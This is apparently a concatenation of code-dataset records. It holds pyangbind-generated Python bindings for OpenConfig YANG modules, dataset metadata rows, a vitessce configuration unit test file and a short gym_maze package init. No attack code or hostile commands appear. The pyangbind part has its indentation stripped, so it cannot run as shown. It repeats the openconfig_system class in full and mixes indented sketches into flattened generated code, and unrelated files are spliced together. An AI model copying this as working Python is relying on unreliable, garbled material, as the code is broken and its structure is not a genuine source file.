'generated-type': """YANGDynClass(base=interfaces.interfaces, is_container='container', yang_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/interfaces', defining_module='openconfig-interfaces', yang_type='container', is_config=True)""",
})
self.__interfaces = t
if hasattr(self, '_set'):
self._set()
def _unset_interfaces(self):
self.__interfaces = YANGDynClass(base=interfaces.interfaces, is_container='container', yang_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/interfaces', defining_module='openconfig-interfaces', yang_type='container', is_config=True)
interfaces = __builtin__.property(_get_interfaces, _set_interfaces)
_pyangbind_elements = OrderedDict([('interfaces', interfaces), ])
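# Hedged usage sketch for the generated binding above; pybindJSON is
# pyangbind's documented serializer (its availability is an assumption here):
#
#     from pyangbind.lib import pybindJSON
#     oc = openconfig_interfaces()
#     print(pybindJSON.dumps(oc))  # emit the (empty) /interfaces container as JSON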
class openconfig_if_ip(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-if-ip - based on the path /openconfig-if-ip. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This model defines data for managing configuration and
operational state on IP (IPv4 and IPv6) interfaces.
This model reuses data items defined in the IETF YANG model for
interfaces described by RFC 7277 with an alternate structure
(particularly for operational state data) and with
additional configuration items.
Portions of this code were derived from IETF RFC 7277.
Please reproduce this note if possible.
IETF code is subject to the following copyright and license:
Copyright (c) IETF Trust and the persons identified as authors of
the code.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, is permitted pursuant to, and subject to the license
terms contained in, the Simplified BSD License set forth in
Section 4.c of the IETF Trust's Legal Provisions Relating
to IETF Documents (http://trustee.ietf.org/license-info).
"""
_pyangbind_elements = {}
from . import lacp
class openconfig_lacp(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-lacp - based on the path /openconfig-lacp. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module describes configuration and operational state
data for Link Aggregation Control Protocol (LACP) for
managing aggregate interfaces. It works in conjunction with
the OpenConfig interfaces and aggregate interfaces models.
"""
__slots__ = ('_path_helper', '_extmethods', '__lacp',)
_yang_name = 'openconfig-lacp'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
helper = kwargs.pop("path_helper", None)
if helper is False:
self._path_helper = False
elif helper is not None and isinstance(helper, xpathhelper.YANGPathHelper):
self._path_helper = helper
elif hasattr(self, "_parent"):
helper = getattr(self._parent, "_path_helper", False)
self._path_helper = helper
else:
self._path_helper = False
self._extmethods = False
self.__lacp = YANGDynClass(base=lacp.lacp, is_container='container', yang_name="lacp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/lacp', defining_module='openconfig-lacp', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return []
def _get_lacp(self):
"""
Getter method for lacp, mapped from YANG variable /lacp (container)
YANG Description: Configuration and operational state data for LACP protocol
operation on the aggregate interface
"""
return self.__lacp
def _set_lacp(self, v, load=False):
"""
Setter method for lacp, mapped from YANG variable /lacp (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_lacp is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_lacp() directly.
YANG Description: Configuration and operational state data for LACP protocol
operation on the aggregate interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=lacp.lacp, is_container='container', yang_name="lacp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/lacp', defining_module='openconfig-lacp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lacp must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=lacp.lacp, is_container='container', yang_name="lacp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/lacp', defining_module='openconfig-lacp', yang_type='container', is_config=True)""",
})
self.__lacp = t
if hasattr(self, '_set'):
self._set()
def _unset_lacp(self):
self.__lacp = YANGDynClass(base=lacp.lacp, is_container='container', yang_name="lacp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/lacp', defining_module='openconfig-lacp', yang_type='container', is_config=True)
lacp = __builtin__.property(_get_lacp, _set_lacp)
_pyangbind_elements = OrderedDict([('lacp', lacp), ])
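# Illustrative usage sketch (hand-written, not pyangbind output). The aggregate
# interface name "Port-Channel1" and the FAST interval value are assumptions
# taken from the openconfig-lacp model for demonstration only.
def _example_populate_lacp():  # pragma: no cover
    oc = openconfig_lacp()
    agg = oc.lacp.interfaces.interface.add("Port-Channel1")
    agg.config.interval = "FAST"  # enumeration leaves are set as strings
    return oc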
from . import components
class openconfig_platform(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-platform - based on the path /openconfig-platform. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines a data model for representing a system
component inventory, which can include hardware or software
elements arranged in an arbitrary structure. The primary
relationship supported by the model is containment, e.g.,
components containing subcomponents.
It is expected that this model reflects every field replaceable
unit on the device at a minimum (i.e., additional information
may be supplied about non-replaceable components).
Every element in the inventory is termed a 'component' with each
component expected to have a unique name and type, and optionally
a unique system-assigned identifier and FRU number. The
uniqueness is guaranteed by the system within the device.
Components may have properties defined by the system that are
modeled as a list of key-value pairs. These may or may not be
user-configurable. The model provides a flag for the system
to optionally indicate which properties are user configurable.
Each component also has a list of 'subcomponents' which are
references to other components. Appearance in a list of
subcomponents indicates a containment relationship as described
above. For example, a linecard component may have a list of
references to port components that reside on the linecard.
This schema is generic to allow devices to express their own
platform-specific structure. It may be augmented by additional
component type-specific schemas that provide a common structure
for well-known component types. In these cases, the system is
expected to populate the common component schema, and may
optionally also represent the component and its properties in the
generic structure.
The properties for each component may include dynamic values,
e.g., in the 'state' part of the schema. For example, a CPU
component may report its utilization, temperature, or other
physical properties. The intent is to capture all platform-
specific physical data in one location, including inventory
(presence or absence of a component) and state (physical
attributes or status).
"""
__slots__ = ('_path_helper', '_extmethods', '__components',)
_yang_name = 'openconfig-platform'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
helper = kwargs.pop("path_helper", None)
if helper is False:
self._path_helper = False
elif helper is not None and isinstance(helper, xpathhelper.YANGPathHelper):
self._path_helper = helper
elif hasattr(self, "_parent"):
helper = getattr(self._parent, "_path_helper", False)
self._path_helper = helper
else:
self._path_helper = False
self._extmethods = False
self.__components = YANGDynClass(base=components.components, is_container='container', yang_name="components", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/platform', defining_module='openconfig-platform', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return []
def _get_components(self):
"""
Getter method for components, mapped from YANG variable /components (container)
YANG Description: Enclosing container for the components in the system.
"""
return self.__components
def _set_components(self, v, load=False):
"""
Setter method for components, mapped from YANG variable /components (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_components is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_components() directly.
YANG Description: Enclosing container for the components in the system.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=components.components, is_container='container', yang_name="components", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/platform', defining_module='openconfig-platform', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """components must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=components.components, is_container='container', yang_name="components", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/platform', defining_module='openconfig-platform', yang_type='container', is_config=True)""",
})
self.__components = t
if hasattr(self, '_set'):
self._set()
def _unset_components(self):
self.__components = YANGDynClass(base=components.components, is_container='container', yang_name="components", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/platform', defining_module='openconfig-platform', yang_type='container', is_config=True)
components = __builtin__.property(_get_components, _set_components)
_pyangbind_elements = OrderedDict([('components', components), ])
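# Illustrative usage sketch (hand-written, not pyangbind output). The component
# name "linecard-1" is an assumption; in practice the component inventory is
# typically populated by the system rather than by configuration.
def _example_populate_components():  # pragma: no cover
    oc = openconfig_platform()
    card = oc.components.component.add("linecard-1")
    card.config.name = "linecard-1"
    return oc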
class openconfig_platform_linecard(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-platform-linecard - based on the path /openconfig-platform-linecard. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines data related to LINECARD components in
the openconfig-platform model
"""
_pyangbind_elements = {}
class openconfig_platform_port(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-platform-port - based on the path /openconfig-platform-port. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines data related to PORT components in the
openconfig-platform model
"""
_pyangbind_elements = {}
class openconfig_platform_transceiver(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-platform-transceiver - based on the path /openconfig-platform-transceiver. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines configuration and operational state data
for transceivers (i.e., pluggable optics). The module should be
used in conjunction with the platform model where other
physical entity data are represented.
In the platform model, a component of type=TRANSCEIVER is
expected to be a subcomponent of a PORT component. This
module defines a concrete schema for the associated data for
components with type=TRANSCEIVER.
"""
_pyangbind_elements = {}
class openconfig_vlan(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-vlan - based on the path /openconfig-vlan. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines configuration and state variables for VLANs,
in addition to VLAN parameters associated with interfaces
"""
_pyangbind_elements = {}
from . import system
class openconfig_system(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-system - based on the path /openconfig-system. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Model for managing system-wide services and functions on
network devices.
Portions of this code were derived from IETF RFC 7317.
Please reproduce this note if possible.
IETF code is subject to the following copyright and license:
Copyright (c) IETF Trust and the persons identified as authors of
the code.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, is permitted pursuant to, and subject to the license
terms contained in, the Simplified BSD License set forth in
Section 4.c of the IETF Trust's Legal Provisions Relating
to IETF Documents (http://trustee.ietf.org/license-info).
"""
__slots__ = ('_path_helper', '_extmethods', '__system',)
_yang_name = 'openconfig-system'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
helper = kwargs.pop("path_helper", None)
if helper is False:
self._path_helper = False
elif helper is not None and isinstance(helper, xpathhelper.YANGPathHelper):
self._path_helper = helper
elif hasattr(self, "_parent"):
helper = getattr(self._parent, "_path_helper", False)
self._path_helper = helper
else:
self._path_helper = False
self._extmethods = False
self.__system = YANGDynClass(base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return []
def _get_system(self):
"""
Getter method for system, mapped from YANG variable /system (container)
YANG Description: Enclosing container for system-related configuration and
operational state data
"""
return self.__system
def _set_system(self, v, load=False):
"""
Setter method for system, mapped from YANG variable /system (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_system is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_system() directly.
YANG Description: Enclosing container for system-related configuration and
operational state data
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """system must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)""",
})
self.__system = t
if hasattr(self, '_set'):
self._set()
def _unset_system(self):
self.__system = YANGDynClass(base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)
system = __builtin__.property(_get_system, _set_system)
_pyangbind_elements = OrderedDict([('system', system), ])
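# Illustrative usage sketch (hand-written, not pyangbind output), showing the
# optional path_helper wiring handled in __init__ above. The hostname value and
# the queried XPath are assumptions for demonstration.
def _example_populate_system():  # pragma: no cover
    from pyangbind.lib.xpathhelper import YANGPathHelper
    ph = YANGPathHelper()
    oc = openconfig_system(path_helper=ph)
    oc.system.config.hostname = "router1"
    # With register_paths=True, instantiated nodes can be resolved by XPath:
    return ph.get("/system/config/hostname")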
from . import system
class openconfig_system(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-system - based on the path /openconfig-system. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Model for managing system-wide services and functions on
network devices.
Portions of this code were derived from IETF RFC 7317.
Please reproduce this note if possible.
IETF code is subject to the following copyright and license:
Copyright (c) IETF Trust and the persons identified as authors of
the code.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, is permitted pursuant to, and subject to the license
terms contained in, the Simplified BSD License set forth in
Section 4.c of the IETF Trust's Legal Provisions Relating
to IETF Documents (http://trustee.ietf.org/license-info).
"""
__slots__ = ('_path_helper', '_extmethods', '__system',)
_yang_name = 'openconfig-system'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
helper = kwargs.pop("path_helper", None)
if helper is False:
self._path_helper = False
elif helper is not None and isinstance(helper, xpathhelper.YANGPathHelper):
self._path_helper = helper
elif hasattr(self, "_parent"):
helper = getattr(self._parent, "_path_helper", False)
self._path_helper = helper
else:
self._path_helper = False
self._extmethods = False
self.__system = YANGDynClass(base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return []
def _get_system(self):
"""
Getter method for system, mapped from YANG variable /system (container)
YANG Description: Enclosing container for system-related configuration and
operational state data
"""
return self.__system
def _set_system(self, v, load=False):
"""
Setter method for system, mapped from YANG variable /system (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_system is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_system() directly.
YANG Description: Enclosing container for system-related configuration and
operational state data
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """system must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)""",
})
self.__system = t
if hasattr(self, '_set'):
self._set()
def _unset_system(self):
self.__system = YANGDynClass(base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)
system = __builtin__.property(_get_system, _set_system)
_pyangbind_elements = OrderedDict([('system', system), ])
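# Serialization sketch, not generated code: pyangbind ships a JSON helper in
# pyangbind.lib.pybindJSON; the exact signature should be checked against the
# installed version. The function below is illustrative and never called.
def _example_system_to_json():
    """Render a fresh openconfig_system binding as a JSON string."""
    from pyangbind.lib import pybindJSON
    return pybindJSON.dumps(openconfig_system())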
| avg_line_length: 42.178075 | max_line_length: 367 | alphanum_fraction: 0.735071 |
| [remaining qsc_* quality-signal columns for this row omitted] |
| hexsha: 53598bc85aa11d1c2ca7ce442a369d4f52e30826 | size: 17,536 | ext: py | lang: Python |
| path: tests/test_config.py | repo: sehilyi/vitessce-python | head: f3dd3ac6fa8bb66e3b25a4e396f16c1a29ce5573 | licenses: ["MIT"] |
| stars/issues/forks counts and event dates: null |
import json
import unittest
from vitessce import (
VitessceConfig,
CoordinationType as ct,
Component as cm,
DataType as dt,
FileType as ft,
hconcat,
vconcat,
)
class TestConfig(unittest.TestCase):
def test_config_creation(self):
vc = VitessceConfig()
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [],
"coordinationSpace": {},
"layout": [],
"initStrategy": "auto"
})
def test_config_add_dataset(self):
vc = VitessceConfig()
my_dataset = vc.add_dataset(name='My Dataset')
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [
{
'uid': 'A',
'name': 'My Dataset',
'files': []
}
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
},
"layout": [],
"initStrategy": "auto"
})
def test_config_add_dataset_add_files(self):
vc = VitessceConfig()
my_dataset = (vc.add_dataset(name='My Chained Dataset')
.add_file(
url="http://example.com/cells.json",
data_type=dt.CELLS,
file_type=ft.CELLS_JSON,
).add_file(
url="http://example.com/cell_sets.json",
data_type=dt.CELL_SETS,
file_type=ft.CELL_SETS_JSON,
)
)
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [
{
'uid': 'A',
'name': 'My Chained Dataset',
'files': [
{
'url': 'http://example.com/cells.json',
'type': 'cells',
'fileType': 'cells.json'
},
{
'url': 'http://example.com/cell_sets.json',
'type': 'cell-sets',
'fileType': 'cell-sets.json'
}
]
},
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
},
"layout": [],
"initStrategy": "auto"
})
def test_config_add_spatial_view(self):
vc = VitessceConfig()
my_dataset = vc.add_dataset(name='My Dataset')
my_view = vc.add_view(my_dataset, cm.SPATIAL)
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [
{
'uid': 'A',
'name': 'My Dataset',
'files': []
}
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
},
"layout": [
{
'component': 'spatial',
'coordinationScopes': {
'dataset': 'A',
},
'h': 1,
'w': 1,
'x': 0,
'y': 0
}
],
"initStrategy": "auto"
})
def test_config_add_scatterplot_view_with_mapping(self):
vc = VitessceConfig()
my_dataset = vc.add_dataset(name='My Dataset')
my_view = vc.add_view(my_dataset, cm.SCATTERPLOT, mapping="X_umap")
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [
{
'uid': 'A',
'name': 'My Dataset',
'files': []
}
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
'embeddingType': {
'A': 'X_umap'
}
},
"layout": [
{
'component': 'scatterplot',
'coordinationScopes': {
'dataset': 'A',
'embeddingType': 'A'
},
'h': 1,
'w': 1,
'x': 0,
'y': 0
}
],
"initStrategy": "auto"
})
def test_config_add_scatterplot_view_with_embedding_coordinations(self):
vc = VitessceConfig()
my_dataset = vc.add_dataset(name='My Dataset')
my_view = vc.add_view(my_dataset, cm.SCATTERPLOT)
et_scope, ez_scope, ex_scope, ey_scope = vc.add_coordination(ct.EMBEDDING_TYPE, ct.EMBEDDING_ZOOM, ct.EMBEDDING_TARGET_X, ct.EMBEDDING_TARGET_Y)
my_view.use_coordination(et_scope, ez_scope, ex_scope, ey_scope)
et_scope.set_value("X_pca")
ez_scope.set_value(2)
ex_scope.set_value(10)
ey_scope.set_value(11)
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [
{
'uid': 'A',
'name': 'My Dataset',
'files': []
}
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
'embeddingType': {
'A': 'X_pca'
},
'embeddingZoom': {
'A': 2
},
'embeddingTargetX': {
'A': 10
},
'embeddingTargetY': {
'A': 11
},
},
"layout": [
{
'component': 'scatterplot',
'coordinationScopes': {
'dataset': 'A',
'embeddingType': 'A',
'embeddingZoom': 'A',
'embeddingTargetX': 'A',
'embeddingTargetY': 'A',
},
'h': 1,
'w': 1,
'x': 0,
'y': 0
}
],
"initStrategy": "auto"
})
def test_config_add_dataset_add_objects(self):
vc = VitessceConfig()
class MockAnnData:
def __init__(self, name):
self.name = name
def serve_obj(obj, obj_i, dataset_uid):
if type(obj) == MockAnnData:
if obj.name == "Experiment A":
return [
{
"url": "http://localhost:8000/cells",
"type": "cells",
"fileType": "cells.json"
},
{
"url": "http://localhost:8000/molecules",
"type": "molecules",
"fileType": "molecules.json"
}
]
elif obj.name == "Experiment B":
return [
{
"url": "http://localhost:8000/cell-sets",
"type": "cell-sets",
"fileType": "cell-sets.json"
}
]
return None
my_dataset = (vc.add_dataset(name='My Object Dataset')
.add_object(
obj=MockAnnData("Experiment A")
).add_object(
obj=MockAnnData("Experiment B")
)
)
vc_dict = vc.to_dict(on_obj=serve_obj)
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [
{
'uid': 'A',
'name': 'My Object Dataset',
'files': [
{
"url": "http://localhost:8000/cells",
"type": "cells",
"fileType": "cells.json"
},
{
"url": "http://localhost:8000/molecules",
"type": "molecules",
"fileType": "molecules.json"
},
{
"url": "http://localhost:8000/cell-sets",
"type": "cell-sets",
"fileType": "cell-sets.json"
}
]
},
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
},
"layout": [],
"initStrategy": "auto"
})
def test_config_set_layout_single_view(self):
vc = VitessceConfig()
my_dataset = vc.add_dataset(name='My Dataset')
my_view = vc.add_view(my_dataset, cm.SPATIAL)
vc.layout(my_view)
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [
{
'uid': 'A',
'name': 'My Dataset',
'files': []
}
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
},
"layout": [
{
'component': 'spatial',
'coordinationScopes': {
'dataset': 'A',
},
'x': 0,
'y': 0,
'h': 12,
'w': 12,
}
],
"initStrategy": "auto"
})
def test_config_set_layout_multi_view(self):
vc = VitessceConfig()
my_dataset = vc.add_dataset(name='My Dataset')
v1 = vc.add_view(my_dataset, cm.SPATIAL)
v2 = vc.add_view(my_dataset, cm.SPATIAL)
v3 = vc.add_view(my_dataset, cm.SPATIAL)
vc.layout(hconcat(v1, vconcat(v2, v3)))
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [
{
'uid': 'A',
'name': 'My Dataset',
'files': []
}
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
},
"layout": [
{
'component': 'spatial',
'coordinationScopes': {
'dataset': 'A',
},
'x': 0,
'y': 0,
'h': 12,
'w': 6,
},
{
'component': 'spatial',
'coordinationScopes': {
'dataset': 'A',
},
'x': 6,
'y': 0,
'h': 6,
'w': 6,
},
{
'component': 'spatial',
'coordinationScopes': {
'dataset': 'A',
},
'x': 6,
'y': 6,
'h': 6,
'w': 6,
}
],
"initStrategy": "auto"
})
def test_config_set_layout_multi_view_magic(self):
vc = VitessceConfig()
my_dataset = vc.add_dataset(name='My Dataset')
v1 = vc.add_view(my_dataset, cm.SPATIAL)
v2 = vc.add_view(my_dataset, cm.SPATIAL)
v3 = vc.add_view(my_dataset, cm.SPATIAL)
vc.layout(v1 | (v2 / v3))
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [
{
'uid': 'A',
'name': 'My Dataset',
'files': []
}
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
},
"layout": [
{
'component': 'spatial',
'coordinationScopes': {
'dataset': 'A',
},
'x': 0,
'y': 0,
'h': 12,
'w': 6,
},
{
'component': 'spatial',
'coordinationScopes': {
'dataset': 'A',
},
'x': 6,
'y': 0,
'h': 6,
'w': 6,
},
{
'component': 'spatial',
'coordinationScopes': {
'dataset': 'A',
},
'x': 6,
'y': 6,
'h': 6,
'w': 6,
}
],
"initStrategy": "auto"
})
def test_load_config(self):
vc = VitessceConfig.from_dict({
"version": "1.0.0",
"name": "Test name",
"description": "Test description",
"datasets": [
{
'uid': 'A',
'name': 'My First Dataset',
'files': [
{
'url': 'http://cells.json',
'type': 'cells',
'fileType': 'cells.json'
}
]
}
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
'spatialZoom': {
'ABC': 11
},
},
"layout": [
{
"component": "spatial",
"props": {
"cellRadius": 50
},
"coordinationScopes": {
"spatialZoom": 'ABC'
},
"x": 5,
"y": 0,
"w": 4,
"h": 4
},
],
"initStrategy": "auto"
})
my_second_dataset = vc.add_dataset(name='My Second Dataset')
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "Test name",
"description": "Test description",
"datasets": [
{
'uid': 'A',
'name': 'My First Dataset',
'files': [
{
'url': 'http://cells.json',
'type': 'cells',
'fileType': 'cells.json'
}
]
},
{
'uid': 'B',
'name': 'My Second Dataset',
'files': []
}
],
'coordinationSpace': {
'dataset': {
'A': 'A',
'B': 'B'
},
'spatialZoom': {
'ABC': 11,
},
},
"layout": [
{
"component": "spatial",
"props": {
"cellRadius": 50
},
"coordinationScopes": {
"spatialZoom": 'ABC'
},
"x": 5,
"y": 0,
"w": 4,
"h": 4
},
],
"initStrategy": "auto"
})
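# Allow running this file directly; the suite is otherwise assumed to be
# collected by pytest/unittest discovery.
if __name__ == '__main__':
    unittest.main()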
| avg_line_length: 29.373534 | max_line_length: 152 | alphanum_fraction: 0.320255 |
| [remaining qsc_* quality-signal columns for this row omitted] |
| hexsha: 536ef3f253904367c74bf94586189e7102090467 | size: 87 | ext: py | lang: Python |
| path: gym_maze/envs/__init__.py | repo: omar-bfs/DQN | head: 50181a2340a49c81476f56b7c74ec8572f4a9042 | licenses: ["MIT"] |
| max_stars_count: 3 | stars events: 2021-08-13T17:02:06.000Z / 2022-03-12T06:30:26.000Z | issues/forks counts and dates: null |
from gym_maze.envs.maze_env import *
from gym_maze.envs.maze_view_2d import MazeView2D
| avg_line_length: 29 | max_line_length: 49 | alphanum_fraction: 0.850575 |
| [remaining qsc_* quality-signal columns for this row omitted] |
| hexsha: 72674cee2ac8b91845475a8e6d2c55824c52ee04 | size: 1,658 | ext: py | lang: Python |
